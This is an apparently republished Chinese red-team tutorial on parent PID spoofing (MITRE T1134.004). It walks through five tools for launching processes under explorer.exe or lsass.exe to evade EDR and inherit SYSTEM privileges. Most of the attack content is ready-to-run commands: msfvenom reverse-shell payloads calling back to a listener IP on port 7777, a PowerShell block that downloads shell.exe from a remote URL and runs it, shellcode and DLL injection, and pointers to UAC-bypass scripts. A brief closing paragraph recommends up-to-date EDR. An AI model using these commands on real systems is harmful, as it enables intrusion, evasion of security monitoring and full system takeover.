红队技术-父进程伪装( MITRE ATT&CK框架:T1134)
2022/4/22 7:15:07
本文主要是介绍红队技术-父进程伪装( MITRE ATT&CK框架:T1134),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
概述
父进程伪装是一种访问令牌操作技术,通过将恶意文件的PPID
指定为explorer.exe
等合法进程的PPID
,可帮助攻击者规避启发式检测等防御技术。
该伪装可通过使用本地API
调用来执行,该调用可帮助攻击者显式指定PID
,如C++
中的CreateProcess
调用。正如我们将在本文中看到的那样,这种显式分配也可能具有某些附带好处。
MITRE 战术:权限提升(TA0004)和 防御规避(TA0005)
MITRE ATT&CK技术:T1134 :Windows访问令牌模拟窃取以及利用
子技术:T1134.004 :访问令牌操作: 父 PID 欺骗
背景:
子进程监控是威胁狩猎中最常见的指标之一。应急响应人员可能会分析如果 conhost.exe
或 cmd.exe
进程是从 Adobe Reader
或 MS Excel
等零相关的应用生成的,则表明可能存在潜在威胁。安全防护软件会在启发式检测下监控此行为,并向管理员发出警报。
父PID(PPID)
欺骗方法可以绕过 AV/EDR
检测,使其认为是 lsass.exe
这样的合法进程在进行活动。它通过欺骗进程的 PID
以匹配其父进程的 PID
来做到这一点。这种方法可能带来的另一个好处是,如果父进程以 SYSTEM
权限运行,则可以凭借访问令牌的继承,使其子进程也具有相同的 SYSTEM
权限。
进程、PID和PPID
进程:在 Windows
中,应用程序由一个或多个进程组成。简单来说,当前正在运行的程序的一部分称为进程。不同的应用程序可能会使用相同的进程(如cmd.exe
),并且为避免歧义,会分配一个整数来区分一个进程和另一个进程。该整数称为PID
。
PID:代表进程标识符 (PID
),它是正在运行的进程的数字表示。 Windows
中通过 GetCurrentProcessID()
函数返回指定进程的 PID
。
父进程:父进程是可以派生多个子进程的进程。例如,命令explorer.exe /e,/root,"C:\WINDOWS\System32\cmd.exe"
将派生cmd.exe
作为父进程explorer.exe
的子进程。在代码中,父进程可以使用fork()
系统调用来派生子进程。
PPID:代表父进程标识符(PPID
),它是提供给父进程的数字表示形式。任何包含子进程的进程都存在父子关系。
方法一(使用C++程序进行PID欺骗)
Didier Stevens
最初在这里的帖子中谈到了Windows API——"CreateProcess"
这种方法。还发布了一个用C++
编写的利用程序(SelectMyParent
)。代码可以在这里下载:https://web.archive.org/web/20210225035252/http:/www.didierstevens.com/files/software/SelectMyParent_v0_0_0_1.zip
请注意,如果您使用的是更高版本的Visual Studio,可能需要重新生成此EXE。在Visual Studio2022中,我删除了Debug and Release文件夹中的SelectMyParent.pdb文件,并重新生成了项目以使其运行。
在进程管理器中,你会看到 explorer.exe
在 PID 1624
上运行
因此,要在这个父 explorer.exe
进程下运行我们自己的二进制文件,可以像这样使用 SelectMyParent.exe
,你会看到在 PID 1624
下创建了一个新进程。
E:\>SelectMyParent.exe notepad 1624
可以看到在PID 2836
启动了notepad.exe
同样,我们也可以运行自己的EXE
。让我们先用msfvenom
创建一个可以反弹shell
的exe
# msfvenom -p windows/shell_reverse_tcp -f exe LHOST=172.19.218.248 LPORT=7777 > shell.exe
在受感染端,使用tasklist /v
查看进程运行详情。
在列表中,可以看到explorer.exe
进程以test
身份在进程ID 1624
上运行。
然后运行生成的shell.exe
,并附属在explorer.exe
的PID
下
监听端收到的shell
便是explorer.exe
进程用户的权限
如果利用具有system
权限的进程,即可进行提权。
方法二(使用Powershell DLL注入进行PID欺骗)
F-Secure
实验室利用 powershell
创建了替代上述Didier
二进制文件的方案。它也可以用于父进程欺骗,与上述方法不同之处在于,可以将带有注入的DLL
的子进程派生为子进程,功能更强大。代码可以在这里下载https://github.com/countercept/ppid-spoofing,首先在受害者机器上查看进程ID
,这里我们选择 Powershell
的 PID 24092
作为父进程ID
。
利用msfvenmon
生成要注入的DLL
msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=172.27.115.207 LPORT=7777 -f dll > shell.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 8704 bytes
然后进行注入:
Import-Module .\PPID-Spoof.ps1 PPID-Spoof -ppid 24092 -spawnto "C:\Windows\System32\notepad.exe" -dllpath .\shell.dll
可以看到注入的DLL
在Notepad.exe
中加载执行了。
通过这种方式,PPID 24092
上的powershell.exe
进程派生了一个带有插入代码(由DLL
提供)的notepad.exe
。
方法三(使用Powershell 脚本入进行PID欺骗)
Decoder-it
根据 Didier Stevens
提供的指南开发了一个 powershell
脚本,使用了 CreateProcessFromParent()
方法,可以在此处找到的psgetsystem脚本:https://github.com/decoder-it/psgetsystem.git,可用于通过PID
欺骗派生子进程。首先我们查看所需进程的 PID
。这里以lsass.exe
为例
然后执行如下命令:
powershell -ep bypass Import-Module .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(520,".\shell.exe","")
如果报错,可能是UAC
的问题,需要先绕过UAC
,或者是权限过低,需要提权。
绕过UAC
脚本可以在这里找到:https://github.com/samratashok/nishang/tree/master/Escalation
然后下载所需的文件,然后执行命令
$client=new-object System.Net.WebClient $client.DownloadFile("http://<url>/psgetsys.ps1",".\psgetsys.ps1") $client.DownloadFile("http://<url>/shell.exe",".\shell.exe") Import-Module .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(520,".\shell.exe","")
可以看到在lsass.exe
下成功创建了子进程,因为lsass.exe
是system
权限,所以反弹shell
也获取到了system
权限。
方法四(使用C#程序进行PID欺骗)
py7hagoras
开发了GetSystem
项目,是上述技术的C#
实现,可以在这里找到:https://github.com/py7hagoras/GetSystem.git
在目标机上下载GetSystem.exe
,然后执行GetSystem.exe 自定义程序 -O 目标进程名
GetSystem.exe shell.exe -O lsass
注意:这里可能也需要绕过UAC
或者提权,不然执行不成功。
方法五(通过PID欺骗注入Shellcode)
Chirag Savla
使用 C#
开发了一个名为“ProcessInjection”的出色工具,它可以执行许多功能,包括通过 PID
欺骗进行的进程注入。通过提供有效的 PID
,该工具会尝试使用 CreateProcess
等原生 API
调用来欺骗 PID
,然后将代码注入其中。该工具支持 hex
、C
和 base64
格式的shellcode
,也可以选择 DLL 注入。工具在这里下载:https://github.com/3xpl01tc0d3r/ProcessInjection
首先,使用msfvenom
创建一个shellcode
代码
msfvenom -p windows/x64/shell_reverse_tcp -exitfunc=thread LHOST=172.19.218.248 LPORT=7777 -f hex > /hex.txt
然后在目标机中下载
使用ProcessInjection.exe
进行注入
ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"hex.txt" /parentproc:explorer /f:hex /t:1
参数说明:
/ppath:目标 EXE 的进程路径(需要注入进程的路径)
/path:shellcode文件路径
/parentproc:父进程名称,目标EXE应在此进程下生成
/f:shellcode文件类型
/t:注入技术
支持的五种注入方式:
1) Vanilla Process Injection 2) DLL Injection 3) Process Hollowing 4) APC Queue 5) Dynamic Invoke - Vanilla Process Injection
我们可以看到calc.exe
在explorer.exe
下,而shellcode
则在calc.exe
中执行。
也可以进行DLL
注入
ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"shell.dll" /parentproc:explorer /t:2
其他工具
https://github.com/Mr-Un1k0d3r/RemoteProcessInjection
https://github.com/xpn/getsystem-offline
https://github.com/hlldz/APC-PPID
https://github.com/ewilded/PPID_spoof
https://github.com/christophetd/spoofing-office-macro (VBA实现)
在Metasploit中Meterpreter 可以使用migrate
命令或者后渗透模块post/windows/manage/migrate
也可以实现进程迁移。
总结
攻击者广泛使用该技术进行检测规避,并增加了应急响应人员检测IoC的时间。针对许多过时的和未打补丁的EDR解决方案,可以使用此技术轻松规避检测。通过本文,告诉大家在组织中应该使用最新的EDR解决方案以及在可以捕捉此类技术的优质产品中使用智能检测功能的重要性。
更多靶场实验练习、网安学习资料,请点击这里>>
这篇关于红队技术-父进程伪装( MITRE ATT&CK框架:T1134)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-27Rocket消息队列资料:新手入门指南
- 2024-11-27rocket消息队资料详解与入门指南
- 2024-11-27RocketMQ底层原理资料详解入门教程
- 2024-11-27RocketMQ项目开发资料:新手入门教程
- 2024-11-27RocketMQ项目开发资料详解
- 2024-11-27RocketMQ消息中间件资料入门教程
- 2024-11-27初学者指南:深入了解RocketMQ源码资料
- 2024-11-27Rocket消息队列学习入门指南
- 2024-11-26Rocket消息中间件教程:新手入门详解
- 2024-11-26RocketMQ项目开发教程:新手入门指南